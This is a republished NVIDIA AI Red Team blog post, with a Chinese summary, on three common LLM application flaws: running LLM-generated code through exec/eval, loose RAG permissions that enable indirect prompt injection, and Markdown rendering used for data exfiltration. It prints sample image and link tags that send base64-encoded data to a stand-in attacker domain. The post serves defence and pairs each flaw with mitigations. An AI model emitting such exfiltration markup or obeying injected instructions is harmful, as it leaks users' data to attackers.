Nvidia Developer 10月03日 00:53
NVIDIA AI Red Team 揭示大型语言模型应用常见安全漏洞
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

NVIDIA AI Red Team (AIRT) 在过去几年中对大量 AI 系统进行了安全评估,发现了一些大型语言模型(LLM)应用中常见的安全漏洞。本篇博客重点介绍了其中三个最显著的风险:LLM 生成代码的执行可能导致远程代码执行(RCE),检索增强生成(RAG)数据源的访问控制不当可能引发数据泄露,以及 LLM 输出中的活动内容渲染可能导致数据外泄。文章详细阐述了这些漏洞的成因,并提供了相应的缓解措施,旨在帮助开发者在开发阶段就加固 LLM 应用的安全性,防范潜在的攻击。

⚠️ **LLM 生成代码的执行风险:** LLM 生成的代码若未经充分隔离便使用 `exec` 或 `eval` 等函数执行,极易被攻击者利用提示注入(prompt injection)生产恶意代码,从而实现远程代码执行(RCE),完全接管应用环境。缓解措施包括避免使用 `exec`、`eval` 等高风险函数,或在安全的沙箱环境中执行动态代码。

🗂️ **RAG 数据源的访问控制不当:** 检索增强生成(RAG)架构中,若对敏感信息的读取权限未按用户进行正确实施,可能导致用户访问越权数据。这通常源于源数据权限设置错误或 RAG 数据存储未能忠实复制源权限。此外,对 RAG 数据存储的广泛写入权限也可能被利用进行间接提示注入,从而污染应用结果或窃取用户数据。建议仔细审查委托授权管理,并限制对 RAG 数据存储的写入权限。

🖼️ **LLM 输出中的活动内容渲染:** LLM 输出中的 Markdown 或其他活动内容(如链接、图片)可能被用于数据外泄。攻击者可诱导用户点击恶意链接或渲染恶意图片,使得浏览器向攻击者服务器发出网络请求,并携带编码的敏感数据。为防范此风险,建议使用内容安全策略限制图片加载源,明确展示超链接地址,或对 LLM 输出进行严格的清理,移除潜在的活动内容。

Over the last several years, the NVIDIA AI Red Team (AIRT) has evaluated numerous and diverse AI-enabled systems for potential vulnerabilities and security weaknesses before they reach production. AIRT has identified several common vulnerabilities and potential security weaknesses that, if addressed during development, can significantly improve the security of LLM-based applications.  

Common findings

In this blog, we share key findings from those assessments and how to mitigate the most significant risks.

Vulnerability 1: Executing LLM-generated code can lead to remote code execution

One of the most serious and recurring issues is using functions like exec or eval on LLM-generated output with insufficient isolation. While developers may use these functions to generate plots, they’re sometimes extended to more complex tasks, such as performing mathematical calculations, building SQL queries, or generating code for data analysis.

The risk? Attackers can use prompt injection, direct or indirect, to manipulate the LLM into producing malicious code. If that output is executed without proper sandboxing, it can lead to remote code execution (RCE), potentially giving attackers access to the full application environment.

Figure 1. A prompt injection used to gain remote code execution against a system that passes LLM-generated code into an exec statement to perform data analysis

The fix here is clear: avoid using exec, eval, or similar constructs—especially in LLM-generated code. These functions are inherently risky, and when combined with prompt injection, they can make RCE almost trivial. Even when exec or eval are nested far into the library and potentially protected by guardrails, an attacker can encapsulate their malicious command in layers of evasion and obfuscation.

In Figure 1, a prompt injection gains RCE through encapsulation in guardrail evasions (shown in green), prompt engineering around the system prompts introduced by calls in the library (blue and orange) before the final payload (pink).

Instead, structure your application to parse the LLM response for intent or instructions and then map those to a predefined set of safe, explicitly permitted functions. If dynamic code execution is necessary, make sure it is executed in a secure, isolated sandbox environment. Our post on WebAssembly-based browser sandboxes outlines one way to approach this safely.

Vulnerability 2: Insecure access control in retrieval-augmented generation data sources

Retrieval-augmented generation (RAG) is a widely adopted LLM application architecture that enables applications to incorporate up-to-date external data without retraining the model. The information retrieval step can also be a vector for attackers to inject data. In practice, we see two major weaknesses associated with RAG use:

First, permission to read sensitive information may not be correctly implemented on a per-user basis. When this happens, users may be able to access information in documents that they shouldn’t be able to see. We commonly see this happen in the following ways. 

    The permissions in the original source of the data (e.g., Confluence, Google Workspace) haven’t been correctly set and maintained. This error is then propagated to the RAG data store when the documents are ingested into the RAG database.The RAG data store doesn’t faithfully reproduce source-specific permissions, often by use of an overpermissioned “read” token to the original source of the documents. Delays in propagating permissions from the source to the RAG database cause staleness issues and leave data exposed.

Reviewing how delegated authorization is managed to the document or data sources can help catch this issue early, and teams can design around it.

The other serious vulnerability we commonly see is broad access to write to the RAG data store. For instance, if a user’s emails are part of the data in the retrieval phase of a RAG pipeline, anyone with that knowledge could have the content included in the data the RAG retriever returns. This opens the door to indirect prompt injection, which in some cases can be very precisely and narrowly targeted, making detection extremely difficult. This vulnerability is often an early element of an attack chain, with later objectives ranging from simply poisoning application results on a specific topic to exfiltrating the user’s personal documents or data.

Mitigating broad write access to the RAG data store can be quite difficult, since it often impacts the desired functionality of the application. For example, being able to summarize a day’s worth of email is a potentially valuable and important use case. In this case, mitigation must occur at other places in the application or be designed around the specific application requirements.

In the case of email, enabling external emails to be excluded or accessed as a separate data source to avoid cross-contamination of results might be a useful approach.  In the case of workspace documents (e.g., SharePoint, Google Workspace), enabling a user to select between only their documents, documents only from people in their organization, and all documents may help limit the impact of maliciously shared documents.  

Content security policies (see the next vulnerability) can be used to reduce the risk of data exfiltration. Guardrail checks can be applied to augmented prompts or retrieved documents to ensure that they’re in fact on-topic for the query. Finally, authoritative documents or data sets for specific domains (e.g., HR-related information) can be established that are more tightly controlled to prevent malicious document injection.

Vulnerability 3: Active content rendering of LLM outputs

The use of Markdown (and other active content) to exfiltrate data has been a known issue since Johann Rehberger published about it in mid-2023. However, the AI Red Team still finds this vulnerability in LLM-powered applications.

By appending content to a link or image that directs the user’s browser to an attacker’s server, that content will appear in the logs of the attacker’s server if the browser renders the image or the user clicks the link, as shown in Figure 2. The renderer must make a network call to the attacker’s domain to fetch the image data. This same network call can also include encoded sensitive data, exfiltrating it to the attacker. Indirect prompt injection can often be exploited to encode information such as the user’s conversation history into a link, leading to data exfiltration.  

<div class="markdown-body">  <p>    <img src="https://iamanevildomain.com/q?SGVsbG8hIFdlIGxpa2UgdhIGN1dCBvZiB5b3VyIGppYiEgRW1haWwgbWUgd2loCB0aGUgcGFzc3dvc mQgQVBQTEUgU0FVQ0Uh" alt="This is Fine">  </p>  <h3>Sources</h3></div>

Similarly, in Figure 3, hyperlinks can be used to obfuscate the destination and any appended query data. That link could exfiltrate Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp by encoding it in the query string as shown.

<a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-7mvu2w" href="https://iamanevildomain.com/q?Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp" node="[object Object]" target="_blank">click here to learn more!</a>
Figure 3. A chat session with the server returning a hyperlink

To mitigate this vulnerability, we recommend one or more of the following:

    Use image content security policies that only allow images to be loaded from a predetermined list of “safe” sites. This prevents the user’s browser from rendering images automatically from an attacker’s servers. For active hyperlinks, the application should display the entire link to the user before connecting to an external site, or links should be “inactive,” requiring a copy-paste operation to access the domain.Sanitize all LLM output to attempt to remove markdown, HTML, URLs, or other potential active content that is generated dynamically by the LLM.As a last resort, disable active content entirely within the user interface.

Conclusion

The NVIDIA AI Red Team has assessed dozens of AI-powered applications and identified several straightforward recommendations for hardening and securing them.  Our top three most significant findings are execution of LLM-generated code leading to remote code execution, insecure permissions on RAG data stores enabling data leakage and/or indirect prompt injection, and active content rendering of LLM outputs leading to data exfiltration. By looking for and addressing these vulnerabilities, you can secure your LLM implementation against the most common and impactful vulnerabilities.

If you’re interested in better understanding the fundamentals of adversarial machine learning, enroll in the self-paced online NVIDIA DLI training, Exploring Adversarial Machine Learning. To learn more about our ongoing work in this space, browse other NVIDIA Technical Blog posts on cybersecurity and AI security.

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

LLM安全 NVIDIA AI Red Team 漏洞 远程代码执行 RAG 数据安全 LLM Security NVIDIA AI Red Team Vulnerabilities Remote Code Execution RAG Data Security
相关文章